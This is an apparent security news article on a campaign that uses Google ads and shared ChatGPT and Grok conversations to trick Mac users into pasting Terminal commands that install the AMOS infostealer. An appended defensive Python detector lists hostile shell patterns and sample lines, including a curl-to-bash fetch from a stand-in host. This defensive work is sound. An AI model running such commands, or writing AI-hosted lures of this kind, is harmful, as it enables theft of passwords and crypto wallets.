Cybercriminals have launched a sophisticated attack campaign that takes advantage of user trust in artificial intelligence platforms to spread the Atomic macOS Stealer (AMOS). This represents a significant advancement in social engineering strategies.
AI and Google Ads: A New Threat Vector
This emerging threat cleverly combines legitimate AI chatbot services like ChatGPT and Grok with paid Google advertising. The aim is to trick unsuspecting Mac users into executing harmful terminal commands, thus compromising their systems.
The campaign targets individuals searching for popular troubleshooting solutions, such as freeing up disk space on macOS. It redirects them to seemingly trustworthy AI-generated instructions hosted on credible domains.
The ClickFix Technique
The attack utilizes a method known as “ClickFix,” which deceives users into manually executing shell commands that download and install malware on their devices.
What makes this campaign particularly potent is that it sidesteps traditional security measures: the instructions appear legitimate because they are hosted on the official ChatGPT and Grok websites as shared conversations, not on suspicious third-party domains.
The Infection Process
The infection chain starts when a Mac user performs a routine Google search for troubleshooting help, like “clear disk space on macOS.” Sponsored ads or top-ranking organic results lead victims to shared ChatGPT or Grok conversations that seem to offer genuine system maintenance advice.
These AI-generated conversations contain meticulously crafted instructions, prompting users to open their Terminal application and paste what appears to be an innocuous command.
The command downloads a script from an attacker-controlled external domain. That script repeatedly prompts for the user’s system password under the pretense of legitimate system operations. Once the correct credentials are entered, it installs the AMOS infostealer along with a persistent backdoor that survives system reboots.
The malware immediately targets cryptocurrency wallets such as Electrum, Exodus, Coinbase, MetaMask, and Ledger Live, extracting seed phrases and private keys for rapid theft of digital assets. It also harvests browser data from Chrome, Safari, and Firefox, including saved passwords and active login sessions.
Protective Measures and Recommendations
Both organizations and individual Mac users should monitor for unsigned applications requesting system passwords, unusual Terminal activity, and unexpected network connections to unfamiliar domains.
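As an added example (not part of the original article), the following Python script applies simple heuristics to shell history lines to flag the "paste this into Terminal" pattern described above: remote content piped into a shell, decoded payloads piped into a shell, AppleScript password prompts, and persistence helpers invoked interactively. The sample history lines are constructed for illustration, not taken from the campaign.

```python
import re
from dataclasses import dataclass

# Heuristics for the "paste this into Terminal" pattern described above.
# Each rule is a regex over a single command line, plus a short reason.
RULES = [
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|)sh\b"),
     "remote content piped straight into a shell"),
    (re.compile(r"\bbase64\b[^|]*(-d|--decode)[^|]*\|\s*(ba|z|)sh\b"),
     "decoded payload piped into a shell"),
    (re.compile(r"\bosascript\b.*hidden answer", re.IGNORECASE),
     "AppleScript dialog collecting a hidden (password) answer"),
    (re.compile(r"\b(nohup|launchctl\s+(load|bootstrap))\b"),
     "background/persistence helper invoked from an interactive shell"),
]

@dataclass
class Finding:
    line_no: int
    reason: str
    command: str

def scan_commands(lines):
    """Return a Finding for every command line matching a rule."""
    findings = []
    for i, cmd in enumerate(lines, 1):
        cmd = cmd.strip()
        if not cmd or cmd.startswith("#"):
            continue
        for pattern, reason in RULES:
            if pattern.search(cmd):
                findings.append(Finding(i, reason, cmd))
                break  # one finding per line is enough for triage
    return findings

# Constructed sample of shell history lines (not from the real campaign).
SAMPLE_HISTORY = [
    "brew update",
    "du -sh ~/Library/Caches",
    "curl -fsSL https://example.invalid/fix.sh | bash",
    "echo aGVsbG8= | base64 -d | sh",
    "osascript -e 'display dialog \"Enter password\" default answer \"\" with hidden answer'",
    "ls -la ~/Library/LaunchAgents",
]

if __name__ == "__main__":
    for f in scan_commands(SAMPLE_HISTORY):
        print(f"line {f.line_no}: {f.reason}: {f.command}")
```

Feed it the contents of ~/.zsh_history or an EDR's process-execution log; legitimate installers also pipe curl into a shell, so treat hits as triage leads rather than verdicts.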
Security teams must educate users that instructions appearing on trusted AI platforms can themselves be attacker-crafted social engineering. Any guidance that involves executing Terminal commands should be independently verified through official support channels before it is followed.
